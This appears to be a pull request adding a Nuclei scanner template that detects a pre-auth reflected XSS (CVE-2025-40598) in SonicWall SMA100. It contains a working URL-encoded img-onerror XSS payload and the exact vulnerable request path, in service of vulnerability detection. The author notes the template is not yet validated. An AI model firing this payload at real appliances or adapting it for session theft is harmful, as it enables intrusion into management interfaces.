### PR TITLE
SonicWall SMA100 - radiusChallengeLogin Reflected XSS (CVE-2025-40598)

### DIFF
--- a/http/cves/2025/CVE-2025-40598.yaml
+++ b/http/cves/2025/CVE-2025-40598.yaml
@@ -1,0 +1,61 @@
+id: CVE-2025-40598
+
+info:
+  name: SonicWall SMA100 - radiusChallengeLogin Reflected XSS (pre-auth)
+  author: watchtowr, x-stp
+  severity: medium
+  description: |
+    Reflected cross-site scripting ghru the "state" parameter on /cgi-bin/radiusChallengeLogin.
+    The state value is reflected unescaped in the HTML response on the management interface.
+    Reported by watchTowr Labs (Jul 28, 2025). WAF not enabled on MC.
+  reference:
+    - "watchTowr Labs - SonicWall SMA100 research (Jul 28, 2025) - https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/"
+  classification:
+    cve-id: CVE-2025-40598
+    cwe-id: CWE-79
+  tags: xss,sonicwall,sma100,preauth,watchtowr,x-stp
+
+variables:
+  rand_int: "{{rand_int}}"
+  payload: "%22%3E%3Cimg/src=x%20onerror=alert({{rand_int}})%3E"
+
+http:
+  - method: GET
+    path:
+      - "/cgi-bin/radiusChallengeLogin?portalName=portal1&status=needchallenge&state={{payload}}"
+
+    headers:
+      Accept: text/html # cgi
+
+    unsafe: true
+    max-redirects: 2
+
+    extractors:
+      - type: regex
+        name: reflected_state
+        part: body
+        regex:
+          - '(?:\"|&quot;)?<img/src=x onerror=alert\((\d+)\)>'
+        internal: true
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        part: header
+        regex:
+          - '(?i)content-type:\s*text/html'
+
+      - type: dsl
+        dsl:
+          - contains(body, string(rand_int))
+
+      - type: word
+        part: body
+        words:
+          - '<img/src=x onerror=alert('
+
+    intrusive: false


### PR DESCRIPTION
Detects a pre-auth reflected Cross-Site Scripting (XSS) vulnerability in SonicWall SMA100 management interface. The issue presents itself via the "state" parameter on /cgi-bin/radiusChallengeLogin which is reflected unescaped in the HTML response 

reported by watchTowr Labs, Jul 28, 2025
https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/

References:
  - watchTowr Labs — SonicWall SMA100 research (Jul 28, 2025)
 

Template Validation

I've validated this template locally?

  [   ] YES
  [X] Not yet 

Additional Details
  - Injected payload is URL-encoded in the request and contains a randomized integer (rand_int) to avoid false positives.
  - The template uses a lightweight, non-intrusive vector: it verifies reflection by matching the integer and the image-onerror pattern in the response body.
  - The template defaults to `unsafe: true` to account for the self-signed certs on mgmt ifaces a fuzz variant if needed.

Classification / Metadata
  - cve-id: CVE-2025-40598
  - cwe-id: CWE-79
  - tags: xss, sonciwall, sma100, preauth, watchtowr, x-stp

Template Validation Checklist
  - [ ] Confirm test host; I'm setting u a demo host
  - [ ] Enforce stronger response checks

References
    - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0012


Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

Cheers, will bump once demo env setup